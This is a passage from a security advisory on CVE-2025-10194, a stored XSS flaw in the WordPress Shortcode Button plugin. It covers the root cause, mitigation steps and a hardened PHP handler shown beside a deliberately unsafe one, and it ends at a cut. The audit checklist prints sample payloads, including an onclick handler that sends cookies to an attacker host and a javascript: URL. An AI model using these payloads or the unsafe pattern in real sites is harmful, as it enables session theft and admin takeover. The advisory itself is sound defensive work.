Hong Kong Security Advisory: Shortcode Button XSS (CVE-2025-10194)

Plugin Name: WordPress Shortcode Button plugin
Type of Vulnerability: Stored XSS
CVE Number: CVE-2025-10194
Urgency: Low
CVE Publish Date: 2025-10-15
Source URL: CVE-2025-10194

Shortcode Button (≤ 1.1.9) — Authenticated Contributor Stored XSS (CVE-2025-10194): What WordPress Site Owners Must Do

Author: Hong Kong Security Expert | Date: 2025-10-15

Summary: An authenticated stored cross-site scripting (XSS) vulnerability affecting the Shortcode Button plugin (versions ≤ 1.1.9, tracked as CVE-2025-10194) allows a low-privileged user (Contributor) to inject JavaScript that is stored and executed when other users view content. This post explains the technical root cause, real-world impact, step-by-step mitigation for site owners, developer fixes, detection techniques, and practical virtual-patching guidance.

TL;DR

  • Vulnerability: Stored Cross-Site Scripting (XSS) in Shortcode Button ≤ 1.1.9.
  • CVE: CVE-2025-10194.
  • Required privilege: Contributor (authenticated user with ability to add or edit posts).
  • Risk: Arbitrary JavaScript execution in the context of site visitors or administrators, depending on where the plugin renders the content; can lead to session theft, content defacement, redirects to malware, or admin takeover.
  • Official fix: Not available at time of disclosure.
  • Immediate actions: Remove/disable plugin if you don’t need it; restrict contributor capabilities; audit and sanitize content; deploy virtual patching (WAF rule). Example rules and detection patterns are included below.
  • Long-term: Patch plugin when an official update is released or apply secure coding fixes in plugin code.

Why this matters (practical explanation)

Most WordPress site owners assume only high-privilege accounts can insert dangerous markup. Shortcodes change the equation: plugins parse shortcode attributes and render HTML in post content and sometimes in the admin UI. If a plugin fails to sanitize or escape shortcode attributes when saving or rendering, a Contributor can embed JavaScript that is stored in the database and executes later when anyone views that page — including Editors and Administrators. That is a stored XSS.

An attacker with a Contributor account can:

  • Insert a malicious shortcode into a post or page they control that stores JavaScript in the database.
  • Wait for an Editor or Administrator to view the post (for example, preview or edit), causing execution in their browser and enabling actions that require those users’ session/auth credentials.
  • Exfiltrate cookies, perform actions on behalf of the victim (CSRF via JavaScript), create additional admin accounts, or inject persistent backdoors.

Because the plugin renders the button, the vulnerability may trigger on both front-end and back-end displays, increasing the attack surface.

Technical root cause (high level)

Typical root cause pattern for stored XSS in shortcode plugins:

  1. The plugin accepts user-controlled attributes (e.g., label, url, title, class).
  2. It does not sanitize input when saving, or does not escape output when rendering.
  3. The attribute is stored (in post_content, postmeta, or options) and later printed without proper escaping (esc_html, esc_attr, esc_url) or with insufficient filtering like strip_tags without whitelisting.
  4. The plugin trusts contributor-provided content or relies on WordPress internals that do not sanitize shortcode attributes automatically.
  5. When the stored data is rendered (front-end, editor preview, or admin list view), the injected JavaScript executes.

Classic examples include script tags or event handler attributes (onmouseover=, onclick=), javascript: URLs in href attributes, or HTML entities that are incorrectly decoded before rendering.
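As an added illustration (not the Shortcode Button plugin's own code), here is a hypothetical shortcode handler that follows the unsafe pattern above, next to a hardened version. The tag name `demo_button` and the attributes `label`, `url` and `class` are assumed; the WordPress functions used (`shortcode_atts`, `esc_url`, `esc_attr`, `esc_html`, `add_shortcode`) are the standard core APIs.

```php
<?php
// Hypothetical demo handler (assumed names), not the plugin's real code.

// UNSAFE: attribute values are interpolated straight into HTML without
// validation or context-aware escaping. A Contributor-supplied
// url="javascript:..." becomes a live link, and any quote in a value can
// break out of the attribute and add its own event handler.
function demo_button_unsafe( $atts ) {
    $a = shortcode_atts(
        array( 'label' => 'Click', 'url' => '#', 'class' => '' ),
        $atts
    );
    return '<a class="btn ' . $a['class'] . '" href="' . $a['url'] . '">'
         . $a['label'] . '</a>';
}

// HARDENED: validate on the way in, escape on the way out, per context.
function demo_button_safe( $atts ) {
    $a = shortcode_atts(
        array( 'label' => 'Click', 'url' => '#', 'class' => '' ),
        $atts,
        'demo_button'
    );

    // esc_url() rejects disallowed schemes such as javascript: and returns
    // an empty string for them; fall back to a harmless value in that case.
    // Its output is already entity-encoded for use inside an attribute.
    $url = esc_url( $a['url'] );
    if ( '' === $url ) {
        $url = '#';
    }

    // Whitelist the class attribute: letters, digits, '-' and '_' only.
    $class = preg_replace( '/[^A-Za-z0-9_-]/', '', $a['class'] );

    // Escape each remaining value for the context it lands in:
    // esc_attr() for an attribute value, esc_html() for a text node.
    return sprintf(
        '<a class="btn %s" href="%s">%s</a>',
        esc_attr( $class ),
        $url,
        esc_html( $a['label'] )
    );
}
add_shortcode( 'demo_button', 'demo_button_safe' );
```

Note that wp_kses filtering on post_content does not help when the plugin stores attribute values in postmeta or options and prints them later, which is why the escaping has to happen in the render function itself.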

Which sites are affected?

  • Sites with the Shortcode Button plugin installed and active at version 1.1.9 or earlier.
  • Sites that allow users to register or that assign the Contributor role to untrusted people.
  • Sites where contributors can add or edit posts/pages or other content that might include shortcodes.

If you are unsure whether this plugin is installed, check your WordPress admin under Plugins → Installed Plugins, or search your filesystem for folders named like the plugin slug.

Immediate mitigation checklist (site owner / admin)

If you manage a WordPress site that uses Shortcode Button ≤ 1.1.9, follow this prioritized checklist immediately:

  1. Put the site into maintenance mode for admin work (optional but recommended).
  2. Deactivate the Shortcode Button plugin.
    • If you rely on the plugin’s functionality and cannot immediately remove it, proceed to the WAF virtual patching steps below and restrict contributor actions until a fix is available.
  3. Audit contributor-created content:
    • Search posts and pages for the plugin shortcode(s) and inspect attributes for suspicious payloads such as:
    • Event handler in attributes:
      [shortcode_button label="Click" url="#" onclick="document.location='https://attacker/?c='+document.cookie"]
    • javascript: URL in href:
      [shortcode_button label="Go" url="javascript:"]
    • Encoded/obfuscated JavaScript:
      Using entity encoding like